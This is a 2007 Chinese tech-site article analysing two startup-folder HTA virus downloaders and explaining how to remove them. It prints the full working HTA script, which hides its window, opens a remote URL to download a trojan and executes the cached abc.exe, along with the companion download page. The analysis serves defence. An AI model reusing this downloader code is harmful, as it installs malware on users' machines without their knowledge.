45IT.COM- 电脑学习从此开始!
DIY硬件教程攒机经验装机配置
设计Photoshop网页设计特效
系统注册表DOS系统命令其它
存储主板显卡外设键鼠内存
维修显卡CPU内存打印机
WinXPVistaWin7unix/linux
CPU光驱电源/散热显示器其它
修技主板硬盘键鼠显示器光驱
办公ExcelWordPowerPointWPS
编程数据库CSS脚本PHP
网络局域网QQ服务器
软件网络系统图像安全
页面导航: 首页 > 电脑学院 > 网络安全 >

Windows.hta Server.hta 病毒简单分析及解决办法

电脑软硬件应用网 45IT.COM 时间:2007-06-21 08:32 作者:ALPHAS STUDIO
  最近几天接连遇见HTA(HTML Application的缩写,HTML应用程序)编写的病毒下载器,主要是以下这两个:
  C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Windows.hta
  C:\Documents and Settings\All Users\「开始」菜单\程序\启动\Server.hta

  以Windows.hta为例,看下代码:

=============================================================
<html><body><script>window.moveTo(4000,4000);window.resizeTo(0,0);var shell=new ActiveXObject("wscript.shell");shell.Run("C:\\Progra~1\\Intern~1\\IEXPLORE.EXE hxxp://www.if56.cn/lo/downmm.html",0,0);function runmm(){var path=shell.SpecialFolders("MyDocuments");var savepath=path.substring(0,path.lastIndexOf("\\"));savepath+="\\Local Settings\\Temporary Internet Files\\Content.IE5\\";var sp=new ActiveXObject("shell.application");var Folders=sp.NameSpace(savepath);for(i=0;i<Folders.Items().Count;i++){var Folder=Folders.Items().Item(i).Path;Folder+="\\abc[1].exe";try{shell.Exec(Folder);}catch(e){};}window.close();};shell.Run("cmd.exe /c tree c:\\ /f",0,1);runmm();</script></body></html>
=============================================================

  程序随机自启动,成功执行后连接到地址hxxp://www.if56.cn/lo/downmm.html下载木马,
downmm.html代码如下:

=============================================================
<html>
<title>
downmm
</title>
<script src="
abc.exe"></script>
<body>
start download.............................
</body>
</html>

=============================================================

  这个abc.exe经过avast扫描,发现木马病毒:
WIN32:Nilage-AI

  解决办法:
  如果防火墙提示Windows.hta 或 Server.hta 访问网络,即是中毒的表现,解决办法很简单,删除
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\里面的文件即可。
顶一下
(0)
0%
踩一下
(2)
100%
------分隔线----------------------------
无法在这个位置找到: baidushare.htm
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
验证码:点击我更换图片
推荐知识